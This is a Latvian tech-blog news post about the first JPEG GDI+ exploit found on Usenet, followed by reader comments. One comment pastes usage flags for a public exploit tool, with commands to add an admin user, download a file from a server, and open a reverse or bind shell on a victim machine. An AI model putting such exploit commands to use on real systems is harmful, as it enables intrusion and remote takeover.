Pirmais JPEG GDI+ vīruss Usenet tīklā

Pirms dažām dienām aprakstītā bīstamā Microsoft JPEG GDI+ ievainojamība jau sāk izplatīties vīrusa izskatā. Slašdotā apspriež pirmo vīrusu, kas atrasts Usenet tīklā. Cik es zinu, tad Latvijā šis tīkls nav populārs, bet tur aiz peļķes tas ir viens no populārākajiem veidiem kā lejupielādēt jaunākos failus – filmas, bildes, programmas utt. Jāatzīmē gan, ka par tiem priekiem ir arī attiecīgi jāmaksā.

Once this JPEG overflowed GDI+, it phoned home, connected to and ftp site and downloaded almost 2megs of stuff. It installs a trojan that installs itself as a service.

It also installs radmin (radmin.com) running as ‘r_server’. From the radmin.com site, “With Radmin you can work on a remote computer exactly as if you were right there at its keyboard.”

Sīkāka informācija par Usenet tīklā atrasto vīrusu ir atrodama Easynews lapā vai arī tepat spogulī.

27 thoughts on “Pirmais JPEG GDI+ vīruss Usenet tīklā

  1. E2Z

    hei ppl, viedie praati varetu man te biki paliidzeet – jautaajums vai ir veerts celt paniku par shitaadiem rezultaatiem uz win2000 ar sp4 (noskaneejot ar coolynx iepriekshmineeto GDIScan):
    Scanning Drive C:…
    C:Program FilesCommon FilesMicrosoft SharedOffice10MSO.DLL
    Version: 10.0.2625.0 <– Possibly vulnerable (Under OfficeXP only)
    C:Program FilesCommon FilesMicrosoft SharedVGXvgx.dll
    Version: 6.0.2800.1106 <– Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
    C:WINNTsystem32dllcachevgx.dll
    Version: 6.0.2800.1106 <– Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
    Scan Complete.
    thnx in advance

    Atbildēt
  2. coolynx

    E2Z: Ja tu never vaļā ofisa failus, kas nāk no nepazīstamiem avotiem, tad guli mierīgi. Visādi citādi droši vien, ka labāk būtu pamēģināt salāpīt to, ko var.

    Atbildēt
  3. Dankans

    Klau! Man taadi suudi kompii! Peles kursors skaraida haotiski shurp, turp. Tas i viirus, vai kaads nevar pateikt man programmas nosaukumu, kutu teiksim vareetu ielaadeet nestarteejot windowu, teiksim biosaa pateikt first boot to un shito un noskaneet cieto draivu nestarteejot windovu.

    Atbildēt
  4. Mamuts

    Tas nav vīrus!!! tas ir tāds kā trojas zirgs bet tas nav vīrus!!! Pilnīgi divas dažādas lietas, lūdzu nevajag dezinformāciju kā arī postēt ja nezin kas un kā

    Atbildēt
  5. coolynx

    Jebkurā gadījumā antivīrusi bļaus kā nelabi ieraugot šādu failu. Tad kāda starpība kā tu to sauc. Lietotājam ir jābaidās no šiem failiem, jo trojāni ar šādām "ekstrām" ir trakāki nekā daži labi vīrusi.

    Atbildēt
  6. Mamuts

    Nu nav gan tā coolynx, trojas zirdziņš rupji sakot paver portu vaļā uz upura pc pie kura tad ver piekonektēties, tad piekonektējoties var nokačāt hvz ko.. Vīrusiņš ne tikai atver portu bet arī padara PC par zombi, tas ir par spama mašīnu flooderi, DDos uzbrukumiem, citu PC skanēšanai un un saindēšanai, irc servaku uzlikšanai, irc kanālos botu palaišanai, ftp izveidošanai utt, tā kā vīrusi ir vairākas pakāpes bīstamāki!!!! Vecīt ir diezgan liela atšķirība kā jau rakstīju… Par tiem AntiVīrusiem tad tie ar bļaus, nu vismaz daži, ja dabūs speciāli veidoto jpeg faiļuku ka tas ir MS bla bla exploits tā ka Antivīrusi ka bļauj tas ir normāli šamiem ir uzdevums bļaut ja kas ne tā..
    Gribu vēl piebilst ka šis trojānis nāk no viena cilvēka, tas ir kontrolē to viens cilvēciņš, tā ka šo jau medī.. Bet skaidrs ir viens tuvākās dienakts laikā uzradīsies jau vīrusi, ilgi nebūs jāgaida tas ir vienozīmīgi..

    Atbildēt
  7. Norkjis

    Nu jā, kaukas ir mainījies? 🙂 warez botu īpašnieki akal neko jaunu kā vien serv-u/mirc/radmin krustojumu nav izdomājuši 🙂 padod tik kārtējo "eksploitu" nagos. pirms msblasta tak pa kluso tieši tas pats gāja vaļā :))

    Atbildēt
  8. coolynx

    Antivīrusi ka bļauj tas ir normāli šamiem ir uzdevums bļaut ja kas ne tā..

    Ja reiz tu sāki skaldīt matus, tad es palūgtu izskaidrot šo dziļo domu. Varu pat noformulēt jautājumu.
    Kāds ir antivīrusu uzdevums? Ja pareizi atbildēsi, tad arī sapratīsi manu domu, ja nē, tad neko – vari vien turpināt skaldīt matus. 🙂

    Atbildēt
  9. sprukstins

    ha ha lielaku lamerismu neesmu redzejis , pat slashdota domu nespej sikais nokert!
    Mamuts , pareizi saki ta ir dezinformacija !
    Un vel kada tas jau ari nav pirmais gadijums kad sikais nesaprot ko pats raksta, labak tad nerakstit vispar ja nezin par ko vins pats raksta.
    Sevi tikai kartejo reizi par apmsieklu domajosu cilveku prieksa noliek.
    Lammers aka coolynx Forever!!!

    Atbildēt
  10. Spameris

    es te bik neiebraucu un taga nav iistais laiks lai kaukur iebrauktu .. ir daudz kas cits par ko domaat… bet tak bija saciits ka tjipa ja uz XP staav SP2 tad shitaa padariishana ar to jpg iet secen.. bet te paar dien atpakalj panjeemu to GDIscan un cik peec komentaariem sapratu tad man uzraadiija ka ir cokji .. kas par h?

    Atbildēt
  11. me

    Kas i` nevarat taskmaneger pa stundu reizi palaist. vai arī nezinat kas par procesiem drīkst stradat kas nee, es par troju runāju, bērnudārzs.

    Atbildēt
  12. keish

    Spitals,drukas kludas jau vel butu pielaujamas(varbut) , katrs ir cilveks un medz kludities.
    Bet to ka coolynx nevajadzetu komentet vai izteikties par lietam kur vinam nekads saprasanas nav , gan nevajdzetu.
    Vienkarsi tacu var turpinat tulkot slashdot.org un citus "news" resursus.
    Ir jau ari pietiekosi laika lai vismaz izalsitu to matrealu ko parpublice, nav jau jasteidzas.

    Atbildēt
  13. e-remit

    Vīruss vai trojānis – kāda šķirba, kurš izdrāž kompi. Tie kliedzēji paši ko sakarīgu lai uztaisa, vai vismaz konstruktīvu kritiku izsaka, nevis mētājas ar apvainojumiem.

    Atbildēt
  14. vdl

    me: a to ka sakariiga troja vareetu no proceslistes pasleepties, nohaidot failus/regkeyus/network konekcijas [vismaz no netstat easy] neesi iedomaajies?

    Atbildēt
  15. Shark

    Jaunākie trojāni sen jau vairs kā nav redzami procesos – tagad ir jāskatās attiecīgie DLL moduļi, kas uz katru procesu ir pāris desmiti vai vairāk.
    Ir tāda lieta, kā statiskā un dinamiskā DLL "injekcija" 🙂
    Un antivīrusi ar visu šādu trojānu atrašanu īpaši nespīd 🙂

    Atbildēt
  16. /dev/null

    http://www.k-otik.com/exploits/09272004.JpegO …
    * Flags Usage:
    * -a: Add User X with Pass X to Admin Group;
    * IE: Exploit.exe -a pic.jpg
    * -d: Download a File From an HTTP Server;
    * IE: Exploit.exe -d http://YourWebServer/Patch.exe pic.jpg
    * -r: Send Back a Shell To a Specified IP on a Specific Port;
    * IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg (Default Port is 1337)
    * -b: Bind a Shell on The Exploited Machine On a Specific Port;
    * IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337)

    Atbildēt
  17. Spitalis

    endrju, es saprotu, ka tev gribas korišu aizstāvēt, bet nav taisnība, ka jābūt nopelniem bagātam un atpazīstamam, lai varētu kritizēt citu centienus kādā jomā.

    Atbildēt
  18. Mamuts

    Par to matu skaldīšanu.. Droši vien tu arī domā coolynx ka nav jau liela šķirba starp Windows un Linux, tač abas ir Operētājsistēmas..
    A par to Antivīrusu tu saprati, prosta ja nav ko argumentēti atbildēt tad labāk paklusēt, nevis pierādīt vēl vairāk ka neesi kompetents šajos jautājumos..

    Atbildēt
  19. endrju

    Spitalis, Tu pārprati. Es nesaku, ka Tev jābūt nopelniem bagātam un atpazīstamam, lai varētu kritizēt. Es vienkārši jautāju ko Tu esi izdarījis? Un pēc tam paskaties, ko coolynx ir izdarījis. Un vai tiešām kādreiz nevajadzētu pateikt kaut vai paldies, nevis visu laiku kritizēt?

    Atbildēt
  20. Spiralis

    Klau, Spitalis, a ko Tu tādu dari/esi izdarījis .lv Internetā, ka tā vari visu laiku sprēgāt?

    Es nezināju, ka koderiem ar loģiku var būt tik švaki.

    Atbildēt

Atbildēt uz komentāru Burkaano Atcelt atbildi

Tava e-pasta adrese netiks publicēta. Obligātie lauki ir atzīmēti kā *